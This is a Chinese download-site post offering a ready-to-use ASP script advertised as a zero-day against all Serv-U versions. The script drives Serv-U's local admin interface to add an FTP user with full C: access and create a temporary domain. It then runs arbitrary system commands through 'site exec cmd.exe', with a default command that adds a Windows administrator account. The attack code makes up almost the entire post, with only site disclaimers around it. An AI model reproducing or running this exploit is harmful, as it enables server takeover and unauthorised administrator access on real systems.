也想出现在这里? 联系我们

serv-u最新通杀所有版本0day asp代码

作者 : 小编 本文共10919个字,预计阅读时间需要28分钟 发布时间: 2021-06-12 共1.87K人阅读
也想出现在这里? 联系我们

要不容易出错的。

复制代码

代码如下:

<style type=\”text/css\”> <!– body,td,th { font-size: 12px; } –> </style> <% Function httpopen(neirong,fangshi,dizhi,refer,cookie) set Http=server.createobject(\”Microsoft.XMLHTTP\”) Http.open fangshi,dizhi,false Http.setrequestheader \”Referer\”,refer Http.setrequestheader \”Content-type\”,\”application/x-www-form-urlencoded\” Http.setrequestheader \”Content-length\”,len(neirong) Http.setrequestheader \”User-Agent\”,\”Serv-U\” Http.setrequestheader \”x-user-agent\”,\”Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)\” If cookie<>\”\” then Http.setrequestheader \”Cookie\”,cookie End If Http.send neirong httpopen=bytes2BSTR(Http.responseBody) set Http=nothing end Function Function getmidstr(L,R,str) int_left=instr(str,L) int_right=instr(str,R) If int_left>0 and int_right>0 Then getmidstr=mid(str,int_left+len(L),int_right-int_left-len(L)) Else getmidstr=\”执行的字符串中不包含“\”&L&\””或“\”&R&\””\” End If end Function Function bytes2BSTR(vIn) strReturn = \”\” For i = 1 To LenB(vIn) ThisCharCode = AscB(MidB(vIn,i,1)) If ThisCharCode < &H80 Then strReturn = strReturn & Chr(ThisCharCode) Else NextCharCode = AscB(MidB(vIn,i+1,1)) strReturn = strReturn & Chr (CLng(ThisCharCode) * &H100 + CInt(NextCharCode)) i = i + 1 End If Next bytes2BSTR = strReturn End Function %> <% \’———-自定义参数开始———– action=Request(\”action\”) loginpass=Request.Form(\”loginpass\”) port=Request(\”port\”) mydomain=Request.Form(\”mydomain\”) path=Request.Form(\”path\”) ftpport = Request.Form(\”ftpport\”) user=Request.Form(\”user\”) pass=Request.Form(\”pass\”) cmd= Request.Form(\”cmd\”) sessionid=Request(\”sessionid\”) organizationId=Request(\”OrganizationId\”) userid=Request(\”userid\”) domainid=Request(\”domainid\”) \’———-自定义参数结束———– select case action case 1 returns=httpopen(\”user=&pword=\”&loginpass&\”&language=zh%2CCN%26\”,\”POST\”,\”http://127.0.0.1:\”&port&\”/Web%20Client/Login.xml?Command=Login&Sync=1227081437828\”,\”http://127.0.0.1:\”&port&\”/?Session=39893&Language=zh,CN&LocalAdmin=1\”,\”\”) sessionid=getmidstr(\”<sessionid>\”,\”</sessionid>\”,returns) if sessionid<>\”\” then Response.Write \”login ok!\”&\”</br>\” Response.redirect \”?action=2&sessionid=\”&sessionid&\”&port=\”&port else Response.Write \”error!\”&\”</br>\” end if case 2 call main2() case 3 returns=httpopen(\”\”,\”POST\”,\”http://127.0.0.1:\”&port&\”/Admin/ServerUsers.htm?Page=1\”,\”\”,sessionid) organizationIdTemp=mid(returns,instr(returns,\”OrganizationUsers.xml&ID=\”),len(\”OrganizationUsers.xml&ID=\”)+15) organizationId=mid(OrganizationIdTemp,instr(OrganizationIdTemp,\”=\”)+1,instr(OrganizationIdTemp,\”\”\”\”)-instr(OrganizationIdTemp,\”=\”)-1) if organizationId<>\”\” then Response.write \”get organizationId \”&OrganizationId&\” ok!\”&\”</br>\” Response.redirect \”?action=4&sessionid=\”&sessionid&\”&port=\”&port&\”&OrganizationId=\”&OrganizationId else Response.write \”error!\”&\”</br>\” end if case 4 call main3() case 5 returns=httpopen(\”\”,\”POST\”,\”http://127.0.0.1:\”&port&\”/Admin/XML/User.xml?Command=AddObject&Object=COrganization.\”&OrganizationId&\”.User&Temp=1&Sync=1227081437828\”,\”http://127.0.0.1:\”&port&\”/Admin/ServerUsers.htm?Page=1\”,sessionid) userid=getmidstr(\”<var name=\”\”ObjectID\”\” val=\”\”\”,\”\”\” />\”,returns) if userid<>\”\” then Response.write \”get userid \”&userid&\” ok!\”&\”</br>\” Response.redirect \”?action=6&sessionid=\”&sessionid&\”&port=\”&port&\”&OrganizationId=\”&OrganizationId&\”&userid=\”&userid else Response.write \”error!\” end if case 6 call main4() case 7 returns=httpopen(\”Access=7999&MaxSize=0&Dir=%2Fc%3A&undefined=undefined&MaxSizeDisp=&\”,\”POST\”,\”http://127.0.0.1:\”&port&\”/Admin/XML/Result.xml?Command=AddObject&Object=CUser.\”&userid&\”.DirAccess&Sync=1227081437828\”,\”http://127.0.0.1:\”&port&\”/Admin/ServerUsers.htm?Page=1\”,sessionid) returns=httpopen(\”LoginID=\”&user&\”&FullName=&Password=\”&pass&\”&ComboPasswordType=%E5%B8%B8%E8%A7%84%E5%AF%86%E7%A0%81&PasswordType=0&ComboAdminType=%E6%97%A0%E6%9D%83%E9%99%90&AdminType=&ComboHomeDir=%2FC%3A&HomeDir=%2F\”&path&\”&ComboType=%E6%B0%B8%E4%B9%85%E5%B8%90%E6%88%B7&Type=0&ExpiresOn=0&ComboWebClientStartupMode=%E6%8F%90%E7%A4%BA%E7%94%A8%E6%88%B7%E4%BD%BF%E7%94%A8%E4%BD%95%E7%A7%8D%E5%AE%A2%E6%88%B7%E7%AB%AF&WebClientStartupMode=&LockInHomeDir=0&Enabled=1&AlwaysAllowLogin=1&Description=&=&IncludeRespCodesInMsgFiles=&ComboSignOnMessageFilePath=&SignOnMessageFilePath=&SignOnMessage=&SignOnMessageText=&ComboLimitType=%E8%BF%9E%E6%8E%A5&LimitType=Connection&QuotaBytes=0&Quota=0&\”,\”POST\”,\”http://127.0.0.1:\”&port&\”/Admin/XML/Result.xml?Command=UpdateObject&Object=COrganization.\”&OrganizationId&\”.User.\”&userid&\”&Sync=1227081437828\”,\”http://127.0.0.1:\”&port&\”/Admin/ServerUsers.htm?Page=1\”,sessionid) Response.write \”add user ok!\”&\”</br>\” Response.redirect \”?action=8&userid=\”&userid&\”&port=\”&port&\”&sessionid=\”&sessionid&\”&OrganizationId=\”&OrganizationId case 8 call main5() case 9 returns=httpopen(\”DomainName=\”&mydomain&\”&Description=test1&Enabled=1&EnableFTP=1&EnableFTPS=0&EnableSSH=0&EnableHTTP=0&EnableHTTPS=0&FTPPort=\”&ftpport&\”&FTPSPort=990&SSHPort=22&HTTPPort=80&HTTPSPort=443&BindIPAddress=&\”,\”POST\”,\”http://127.0.0.1:\”&port&\”/Admin/XML/Result.xml?Command=ObjectCommand&Object=CServer.0.CreateDomain&Sync=1227081437828\”,\”http://127.0.0.1:\”&port&\”/Admin/ServerUsers.htm?Page=1\”,sessionid) domainid=getmidstr(\”<ObjectID>\”,\”</ObjectID>\”,returns) Response.write \”create domain ok!\”&\”</br>\” Response.redirect \”?action=10&userid=\”&userid&\”&port=\”&port&\”&sessionid=\”&sessionid&\”&OrganizationId=\”&OrganizationId&\”&domainid=\”&domainid case 10 call main6() case 11 set b=Server.CreateObject(\”Microsoft.XMLHTTP\”) b.open \”GET\”, \”http://127.0.0.1:\”&ftpport&\”/\”, false, \”\”, \”\” b.send \”User \” & user & vbCrLf & \”pass \”& pass & vbCrLf & \”site exec c:\\windows\\system32\\cmd.exe /c \”& cmd & vbCrLf & \”QUIT\” & vbCrLf Response.Write Replace(b.responseText,chr(13),\”\”) Response.redirect \”?action=12&userid=\”&userid&\”&port=\”&port&\”&sessionid=\”&sessionid&\”&OrganizationId=\”&OrganizationId&\”&domainid=\”&domainid case 12 call main7() case 13 returns=httpopen(\”IDs=\”&domainid&\”&\”,\”POST\”,\”http://127.0.0.1:\”&port&\”/Admin/XML/Result.xml?Command=DeleteObject&Object=CServer.0.Domain&Sync=1227081437828\”,\”http://127.0.0.1:\”&port&\”/Admin/ServerUsers.htm?Page=1\”,sessionid) Response.Write \”临时域清理完毕!用户请手动清理,因为serv-u的userid变化我搞不懂.\”&\”</br>\” case else call main1() end select sub main1() %> <form id=\”form1\” name=\”form1\” method=\”post\” action=\”?action=1\”> <table width=\”264\” border=\”0\” align=\”center\” cellpadding=\”0\” cellspacing=\”0\”> <tr> <td colspan=\”2\” align=\”center\”><strong>第一步:获取sessionid</strong></td> </tr> <tr> <td align=\”right\”>管理端口:</td> <td><input name=\”port\” type=\”text\” id=\”port\” value=\”43958\” /></td> </tr> <tr> <td align=\”right\”>管理员密码:</td> <td><input name=\”loginpass\” type=\”text\” id=\”loginpass\” value=\”1\” /></td> </tr> <tr> <td colspan=\”2\” align=\”center\”><input type=\”submit\” name=\”button\” id=\”button\” value=\”提交\” /> </td> </tr> </table> </form> <p align=center><strong>一般情况下不用改,如果管理员改了的话就填上去.</strong></p> <% end sub %> <% sub main2() %> <form id=\”form1\” name=\”form1\” method=\”post\” action=\”?action=3&sessionid=<%=sessionid%>&port=<%=port%>\”> <table width=\”264\” border=\”0\” align=\”center\” cellpadding=\”0\” cellspacing=\”0\”> <tr> <td colspan=\”2\” align=\”center\”><strong>第二步:获取OrganizationId</strong></td> </tr> <tr> <td colspan=\”2\” align=\”center\”><input type=\”submit\” name=\”button\” id=\”button\” value=\”提交\” /> </td> </tr> </table> </form> <p align=center><strong>这一步有点慢,请等待.</strong></p> <% end sub %> <% sub main3() %> <form id=\”form1\” name=\”form1\” method=\”post\” action=\”?action=5&sessionid=<%=sessionid%>&port=<%=port%>&OrganizationId=<%=OrganizationId%>\”> <table width=\”264\” border=\”0\” align=\”center\” cellpadding=\”0\” cellspacing=\”0\”> <tr> <td colspan=\”2\” align=\”center\”><strong>第三步:获取userid</strong></td> </tr> <tr> <td colspan=\”2\” align=\”center\”><input type=\”submit\” name=\”button\” id=\”button\” value=\”提交\” /> </td> </tr> </table> </form> <% end sub %> <% sub main4() %> <form id=\”form1\” name=\”form1\” method=\”post\” action=\”?action=7&sessionid=<%=sessionid%>&port=<%=port%>&OrganizationId=<%=OrganizationId%>&userid=<%=userid%>\”> <table width=\”264\” border=\”0\” align=\”center\” cellpadding=\”0\” cellspacing=\”0\”> <tr> <td colspan=\”2\” align=\”center\”><strong>第四步:加用户</strong></td> </tr> <tr> <td align=\”right\”>新ftp账号:</td> <td><input name=\”user\” type=\”text\” id=\”user\” value=\”ash\” /></td> </tr> <tr> <td align=\”right\”>新ftp密码:</td> <td><input name=\”pass\” type=\”text\” id=\”pass\” value=\”hahaha\” /></td> </tr> <tr> <td align=\”right\”>系统路径:</td> <td><input name=\”path\” type=\”text\” id=\”path\” value=\”c:\” /></td> </tr> <tr> <td colspan=\”2\” align=\”center\”><input type=\”submit\” name=\”button\” id=\”button\” value=\”提交\” /> </td> </tr> </table> </form> <% end sub %> <% sub main5() %> <form id=\”form1\” name=\”form1\” method=\”post\” action=\”?action=9&port=<%=port%>&userid=<%=userid%>&sessionid=<%=sessionid%>&OrganizationId=<%=OrganizationId%>\”> <table width=\”264\” border=\”0\” align=\”center\” cellpadding=\”0\” cellspacing=\”0\”> <tr> <td colspan=\”2\” align=\”center\”><strong>第五步:创建域</strong></td> </tr> <tr> <td align=\”right\”>要添加的域:</td> <td><input name=\”mydomain\” type=\”text\” id=\”mydomain\” value=\”testhack\” /></td> </tr> <tr> <td align=\”right\”>域端口:</td> <td><input name=\”ftpport\” type=\”text\” id=\”ftpport\” value=\”60000\” /></td> </tr> <tr> <td colspan=\”2\” align=\”center\”><input type=\”submit\” name=\”button\” id=\”button\” value=\”提交\” /> </td> </tr> </table> </form> <% end sub %> <% sub main6() %> <form id=\”form1\” name=\”form1\” method=\”post\” action=\”?action=11&port=<%=port%>&userid=<%=userid%>&sessionid=<%=sessionid%>&OrganizationId=<%=OrganizationId%>&domainid=<%=domainid%>\”> <table border=\”0\” align=\”center\” cellpadding=\”0\” cellspacing=\”0\”> <tr> <td colspan=\”2\” align=\”center\”><strong>执行命令</strong></td> </tr> <tr> <td align=\”right\”>FTP账号:</td> <td><input name=\”user\” type=\”text\” id=\”user\” value=\”ash\” /></td> </tr> <tr> <tr> <td align=\”right\”>FTP密码:</td> <td><input name=\”pass\” type=\”text\” id=\”pass\” value=\”hahaha\” /></td> </tr> <tr> <td align=\”right\”>FTP端口:</td> <td><input name=\”ftpport\” type=\”text\” id=\”ftpport\” value=\”60000\” /></td> </tr> <tr> <td align=\”right\”>你的语句:</td> <td><input name=\”cmd\” type=\”text\” id=\”cmd\” value=\”net user admin admin123456 /add&net localgroup administrators admin /add\” size=\”80\” /></td> </tr> <tr> <td colspan=\”2\” align=\”center\”><input type=\”submit\” name=\”button\” id=\”button\” value=\”提交\” /> </td> </tr> </table> </form> <p align=center><strong>注意:如果是serv-u 7.0,这里可以马上点提交.</strong></p> <p align=center><strong>注意:如果是serv-u 7.0以上,请在执行完上一步之后过大概半分钟才提交.</strong></p> <% end sub %> <% sub main7() %> <form id=\”form1\” name=\”form1\” method=\”post\” action=\”?action=13&port=<%=port%>&userid=<%=userid%>&sessionid=<%=sessionid%>&OrganizationId=<%=OrganizationId%>&domainid=<%=domainid%>\”> <table width=\”264\” border=\”0\” align=\”center\” cellpadding=\”0\” cellspacing=\”0\”> <tr> <td colspan=\”2\” align=\”center\”><strong>删除临时域</strong></td> </tr> <tr> <td colspan=\”2\” align=\”center\”><input type=\”submit\” name=\”button\” id=\”button\” value=\”提交\” /> </td> </tr> </table> </form> <% end sub %>

把上面代码保存成tmdsb.asp就行了。

1. 本站所提供的源码模板(主题/插件)等资源仅供学习交流,若使用商业用途,请购买正版授权,否则产生的一切后果将由下载用户自行承担,有部分资源为网上收集或仿制而来,若模板侵犯了您的合法权益,请来信通知我们(Email: rayer@88.com),我们会及时删除,给您带来的不便,我们深表歉意!
2. 分享目的仅供大家学习和交流,请不要用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布投稿,分享有金币奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务 请大家谅解!
5. 如有链接无法下载、失效或广告,请联系站长,可领回失去的金币,并额外有奖!
6. 如遇到加密压缩包,默认解压密码为"www.zyfx8.cn",如遇到无法解压的请联系管理员!
本站部分文章、资源来自互联网,版权归原作者及网站所有,如果侵犯了您的权利,请及时联系我站删除。免责声明
资源分享吧 » serv-u最新通杀所有版本0day asp代码

常见问题FAQ

免费下载或者VIP会员专享资源能否直接商用?
本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
织梦模板使用说明
你下载的织梦模板并不包括DedeCMS使用授权,根据DedeCMS授权协议,除个人非盈利站点外,均需购买DedeCMS商业使用授权。购买地址: http://www.desdev.cn/service-dedecms.html

发表评论

Copyright 2015-2020 版权所有 资源分享吧 Rights Reserved. 蜀ICP备14022927号-1
开通VIP 享更多特权,建议使用QQ登录